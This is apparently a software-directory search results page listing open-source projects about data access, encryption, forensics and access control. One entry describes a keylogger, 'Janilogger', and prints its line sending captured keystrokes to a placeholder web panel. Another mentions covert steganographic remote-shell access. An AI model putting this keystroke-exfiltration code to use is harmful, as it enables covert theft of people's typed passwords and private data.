Showing 109 open source projects for "access data"

View related business solutions
  • Build with generative AI, deploy apps fast, and analyze data in seconds—all with Google-grade security. Icon
    Google Cloud is a cloud-based service that allows you to create anything from simple websites to complex applications for businesses of all sizes.
  • The Voice API that just works | Twilio Icon
    The Voice API that just works | Twilio

    Build a scalable voice experience with the API that's connecting millions around the world.

    With Twilio Voice, you can build unique phone call experiences with one API, to create, receive, control and monitor calls with just a few lines of code. Create an engaging voice experience that you can quickly scale and modify with a wide array of customization options and resources.
  • 1
    HFV (Hidden Folder Virus) Cleaner Pro

    HFV (Hidden Folder Virus) Cleaner Pro

    A Small Utility programmed to destroy Win32:Atraps-PZ[Trojan]

    Many a times when we connect our PenDrive to a PC or Laptop, wedon't see our files and folders, instead see one or multiple shortcuts. Assuming these shortcuts as innocent, we launch them which in turn infects our PC or laptop with a virus which the geeks call Win32:Atraps-PZ[Trojan] Simply speaking, the shortcut creates a backdoor to your system so that it can access all your files,services and privileges within that system & all others connected to it without your permission...
    Downloads: 106 This Week
    Last Update:
    See Project
  • 2
    An enterprise-focused NetFlow reporter/analyzer tool featuring clickable graphs, powerful categorization, automatic exporter discovery, and full access to all aspects of the raw flow data (millisecond accuracy, QoS settings, TCP flags, etc).
    Downloads: 2 This Week
    Last Update:
    See Project
  • 3

    ELock

    Prevent unauthorised access to operating system

    The ELock program allows administrator to block access to operating system on Windows CE5.0, CE6.0 devices. It allows to control running programs. The functionality is similar to AppCenter (which works only on Motorola devices). Works on Motorola, Casio, Datalogic and others devices. Program ELock pozwala administratorowi zablokować dostęp użytkownika do opcji systemu na urządzeniach z systemem Windows CE5.0, CE6.0. Umożliwia kontrolę uruchamianych programów. Jest programem podobnym do...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 4
    Ralasafe Access Control Middleware focus on data-level privilege management, including database row/column and content privilege management. It also manages 2) login control; 3) function-level privilege management; and 4) URL privilege authentication
    Downloads: 0 This Week
    Last Update:
    See Project
  • Free and Open Source HR Software Icon
    Free and Open Source HR Software

    OrangeHRM provides a world-class HRIS experience and offers everything you and your team need to be that HR hero you know that you are.

    Give your HR team the tools they need to streamline administrative tasks, support employees, and make informed decisions with the OrangeHRM free and open source HR software.
  • 5
    RŌNIN-LINUX

    RŌNIN-LINUX

    Linux Security Distro for Data Forensics, Pen. Testing, and IR.

    RŌNIN is a linux security distribution (based on Lubuntu) that provides a platform for both training and conducting professional data forensics, penetration testing, and incident response. The primary objective of RŌNIN is to provide a fast/light linux desktop along with a curation of security tools and resources that are relevant for professionals, instructors, and students alike. In support of this objective, the RŌNIN project is guided by two main goals: * Focus on Continual...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 6
    IOS6 and recent iTunes updates have broken a few features. We have made some partial fixes, but they are not complete. If you'd like to help support our development, or take over the development please let us know. Explore the internal file structure of your iphone (or of a seized phone in the case of forensic teams) using either the iphone's own backup files or (for jail broken iphones) ssh. Viewing of plist, sqlite, and hex are supported. IOS 5 is now supported iOS 6 only partially...
    Leader badge
    Downloads: 45 This Week
    Last Update:
    See Project
  • 7

    yeo

    command-line steganography application

    designed to hide messages in jpg and png images without the requirement for any plain-text files. uses aes256 on data, using an sha256 hash of the password as the encryption key. rotates the password by 1 character, and uses an sha256 hash of that for the random seed for the image pointer access. security and invisibility of data is currently being peer-reviewed (since ~2014). At this point it looks like no vulnerabilities have been identified yet. this will evolve further, but remain...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 8

    DAL4j

    Data Access Layer 4 Java

    Welcome to Data Access Layer for Java (DAL4j) a set of command line tools and framework used to reverse engineer a MySQL or SQLServer database schema into a set of JPA Entity Beans. DAL4j can be useful for scenarios where there is an existing database schema but a technology other that JPA is used to interact with the database. DAL4j can provide an easy way to migrate your code base from other technologies such as JDBC or Hibernate to JPA. The beans generated can be 1 or two types: Simple...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 9
    Janilogger

    Janilogger

    Visual Basic based keylogger program

    Janilogger collects keystrokes to a textbox. And send the collected data to website panel. The asp file send datas to database. For example: You uploaded your log.asp to x.com . Janilogger sends datas to your database via log.asp with this command Webbrowser1.Navigate("http://www.x.com/log.asp?yaz=text1.text") -Log.asp included in source files
    Downloads: 0 This Week
    Last Update:
    See Project
  • Intelligent network automation for businesses and organizations Icon
    Intelligent network automation for businesses and organizations

    Network automation for the hybrid multi-cloud era

    BackBox seamlessly integrates with network monitoring and NetOps platforms and automates configuration backups, restores, and change detection. BackBox also provides before and after config diffs for change management, and automated remediation of discovered network security issues.
  • 10
    CryBit Password

    CryBit Password

    Safe and Simple

    Crybit Password Password Storage Software and on growing For details and Support: http://monstersoftware.clan.su Crybit Password Parola Saklama Yazılımdır ve Her Geçen Gün Gelişmektedir Detaylar Ve Destek için: http://monstersoftware.clan.su
    Downloads: 0 This Week
    Last Update:
    See Project
  • 11
    Data exchange is a core part of all cloud systems so it becomes necessarily important to control access to data that are confidential and whose integrity influences the state of the system at any time.It can be proven that the administrator in a IaaS can easily perform some hidden and malicious task on unsuspecting customer machine. This is attributed to the fact that he/she possesses the root privilege to do so and forms an attack. A cold boot attack can easily be lauched amongst other...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 12
    ..., SuStorID is a host-based Intrusion Detection System, and by means of modsecurity can access internal web server’s data (i.e. http request/response fields) exactly as Apache does.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 13
    Over-encrypt provides a secure solution for data sharing capabilities in an outsourcing scenario where the storage service provider is trusted neither for data confidentiality nor for enforcing access control functionalities.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 14
    PasSafe
    PasSafe is a free & open source password manager for all Operating Systems. Store your passwords in a highly-encrypted database locked with one master password.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 15
    secureStore
    Designed for data centre management, secureStore uses end to end encryption, granular user access control, comprehensive login, and open source technology to create a secure way to manage sensitive information such as private keys, certificates, etc.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 16
    ConDEnSE (Confidential Data Enabled Statistical Exploration) will be a web-based environment for statistical analysis of confidential data from various database sources, based on Plone and R, and using the Jackknife method of confidentiality protection.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 17
    The project consist in an open source implementation of the W3C Recommendation of the XML Key Management Specification 2.0 XKMS 2.0. It is compound of a XKMS Server and a Client API to access to the Server via Web Service.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 18
    The main purpose of this project is to develop a Graphic policy definition editor implemented in Java language and based on the XACML standard which manages access control policies
    Downloads: 0 This Week
    Last Update:
    See Project
  • 19
    The eXtensible Access Control Markup Language (XACML) allows for generic access control policies in XML format. pam_xacml provides XACML support for many existing pam enabled applications (no changes to the code required).
    Downloads: 0 This Week
    Last Update:
    See Project
  • 20
    Zeus provides an API for developers to protect with AES Encryption and compress with ZIP application specific data not intended for public access. Zeus, the tool, integrates with Windows Explorer to protect sensitive data.
    Downloads: 1 This Week
    Last Update:
    See Project
  • 21
    A random number generator based on data from human interface devices. A trayicon that provides access to the generated data in various data ouput formats: Guids, Passwords, Files etc. Future goal is build-in P2P exchange of gathered data.
    Downloads: 1 This Week
    Last Update:
    See Project
  • 22
    Cypher is an encryption program that uses the AES (Rijndael) algorithm to encrypt and decrypt files. You can use Cypher to protect sensitive data from unwanted access.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 23
    Steganography tool which establishes a full-duplex steganographic data transfer protocol utilizing Real-time Transfer Protocol (RTP) packet payloads as the cover medium. The tool provides interactive chat, file transfer, and remote shell access.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 24
    MicroSafe is a J2ME 1.0 application to store and access notes in a hierarchical data structure (outline) on mobile devices (CLDC - Connected Limited Device Configuration). Notes can be encrypted to store data like PINs, passwords, etc. securely.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 25
    cpm is a small console tool to manage passwords and store them public key encrypted in a file - even for more than one person. The encryption is handled via GnuPG so you can access the programs data via gpg as well.
    Downloads: 0 This Week
    Last Update:
    See Project